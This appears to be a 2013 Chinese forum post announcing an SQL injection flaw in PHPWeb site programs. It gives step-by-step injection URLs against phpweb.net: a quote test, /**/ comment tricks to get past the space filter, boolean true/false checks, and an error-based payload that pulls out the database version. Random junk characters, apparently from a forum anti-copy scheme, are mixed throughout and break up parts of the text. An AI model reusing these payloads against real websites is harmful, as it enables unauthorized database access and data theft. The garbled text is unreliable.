phpweb所有的整站程序伪静态页面都存在sql注入
1 s$ S- c. G/ G- b/ L- |6 }; v% B1 i" }- G9 [2 t2 R
主站:http://phpweb.net/* M4 A6 l, }5 y# g* e' C
加’检测:" {$ `; a" W: K8 _+ v6 E/ z0 }
" }8 _$ a& S' Z/ E& I3 Q
http://www.phpweb.net/down/html/?772′.html
8 Y% J4 I. H% m% a( w . n9 ~0 ]* E1 ]) N* B/ ^
出错) T9 W7 l$ p/ N$ I7 o
存在注入。) t, H$ {$ ]* w ~5 C# J
不能用空格,只能用/*罗
! B3 ^6 Y9 q p$ Lhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
! r& ?0 D3 N0 o' V 3 W" \, i5 C2 Y* v: I
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.5 c. V2 O& u) D* {! A% `* A
爆数据库版本:
" m' V' y2 X; Z4 j" Y/ f z6 ^: @0 X( t# Y
?8 B% w3 H; [4 L# Z% D T+ _# f7 F
1
8 `% n6 D l4 G% f- [http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html4 y$ t8 J2 R3 b( x/ `; F
更新日期: 2013-01-03 13:39:50 ; f: o8 b7 T! ?
|
发表于 2013-1-4 19:46:42
收藏
支持
反对